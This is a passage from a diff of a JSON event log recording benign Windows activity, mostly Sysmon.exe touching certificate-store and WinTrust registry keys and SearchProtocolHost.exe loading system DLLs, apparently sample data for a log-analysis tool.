"C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mssph.dll", + "image_path": "C:\\Windows\\System32\\mssph.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", + "registry_value": "SyncRootManager", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "authz.dll", + "image_path": "C:\\Windows\\System32\\authz.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": 